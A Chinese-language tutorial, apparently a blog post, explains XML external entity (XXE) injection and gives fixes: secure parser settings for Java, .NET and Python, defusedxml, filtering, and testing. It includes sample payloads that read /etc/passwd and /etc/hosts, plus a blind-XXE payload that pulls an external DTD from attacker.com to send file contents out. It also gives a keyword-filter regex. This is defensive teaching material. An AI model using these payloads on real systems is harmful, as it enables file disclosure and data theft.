XML外部实体注入与修复方案

XML外部实体注入(XXE)是一种严重的安全漏洞,攻击者利用XML解析器处理外部实体的功能来读取服务器内部文件、执行远程请求(SSRF)、扫描内网端口或发起拒绝服务攻击。以下是详细解释和修复方案:


XXE 攻击原理

  1. 外部实体声明

    XML允许定义实体(变量),实体可引用外部资源:

    xml

    复制代码
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
  2. 实体注入

    攻击者将恶意实体注入XML输入:

    xml

    复制代码
    <data>&xxe;</data>

    解析器会将 &xxe; 替换为 /etc/passwd 文件内容。

  3. 攻击类型

    • 读取本地文件(file://

    • 发起HTTP请求(http://)→ SSRF

    • 拒绝服务(Billion Laughs 攻击)

    • 端口扫描(结合SSRF)


修复方案

1. 禁用外部实体处理(根本方案)

Java (SAX/DOM)

java

复制代码
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

.NET (XmlReader)

csharp

复制代码
var settings = new XmlReaderSettings {
  DtdProcessing = DtdProcessing.Prohibit,
  XmlResolver = null  // 禁用解析器
};

Python (lxml)

python

复制代码
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
2. 使用安全的XML库
  • 优先选择默认禁用外部实体的库:

    • Java: OWASP Java Encoderjackson-dataformat-xml

    • Python: defusedxml(替代标准库)

      python

      复制代码
      from defusedxml.ElementTree import parse
      parse(xml_file)
3. 输入验证与过滤
  • 过滤用户输入的 <!DOCTYPE><!ENTITY> 声明

  • 使用正则表达式拦截敏感关键字(临时缓解):

    regex

    复制代码
    <!ENTITY.*?SYSTEM|file:|http:
4. 输出编码

避免直接输出XML解析结果,使用HTML编码:

java

复制代码
String safeOutput = Encode.forHtmlContent(rawXMLOutput);
5. 服务器层防御
  • WAF规则 :拦截包含 ENTITYSYSTEM 等关键词的请求

  • 文件权限:限制应用账户对系统文件的访问权限


XXE 检测方法

  1. 手动测试

    提交测试Payload:

    xml

    复制代码
    <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hosts"> ]>
    <data>&xxe;</data>
  2. 自动化工具

    • OWASP ZAP、Burp Suite Professional(主动扫描)

    • XXEinjector(自动化利用工具)


额外注意事项

  • 依赖库风险:即使代码安全,底层库(如Log4j 1.x)可能引入XXE

  • 非文件协议攻击 :防范 php://filtergopher:// 等协议

  • 盲XXE:通过DNS查询或HTTP请求外带数据(需配置外部DTD)

    xml

    复制代码
    <!ENTITY % payload SYSTEM "file:///secret">
    <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
    %dtd;

修复后验证

  1. 使用单元测试覆盖XXE攻击场景

  2. 定期进行安全扫描(SAST/DAST)

  3. 渗透测试:尝试读取 /etc/passwd 或触发DNS查询

关键原则:始终禁用DTD和外部实体解析。大多数现代XML解析器提供了明确的开关选项,启用安全配置是防御XXE的核心。

相关推荐
风控PM说8 分钟前
入门第二课:业务催生风险,常见的业务风险有哪些?
安全
无限的鲜花7 小时前
反射(原创推荐)
java·开发语言
IT二叔7 小时前
Java项目部署-03-teamcity-cicd-docker镜像流水线方式部署
java·ci/cd·持续部署
一路向北he7 小时前
字节钢铁军团--“提供情境,而非控制”
java·开发语言·前端
kyriewen8 小时前
豆包和千问同时关了智能体,我用它们搭的 3 个自动化全废了——迁移方案整理
前端·javascript·ai编程
超级数据查看器8 小时前
超级数据查看器 v10.0 发布
java·大数据·数据库·sqlite·安卓
铁皮饭盒8 小时前
用 Bun.cron 定时 7 月 7 日,为啥? 看图1
javascript
折哥的程序人生 · 物流技术专研9 小时前
《Java 100 天进阶之路》第50篇:阻塞队列与并发容器(2026版)
java·面试题·java进阶·blockingqueue·并发容器·集合源码·java100天进阶
ai_coder_ai9 小时前
编写自动化脚本,在自己后端服务中使用Open Api进行设备相关操作
java·运维·自动化
硕风和炜10 小时前
【LeetCode: 2492. 两个城市间路径的最小分数 + DFS】
java·算法·leetcode·深度优先·dfs·bfs·并查集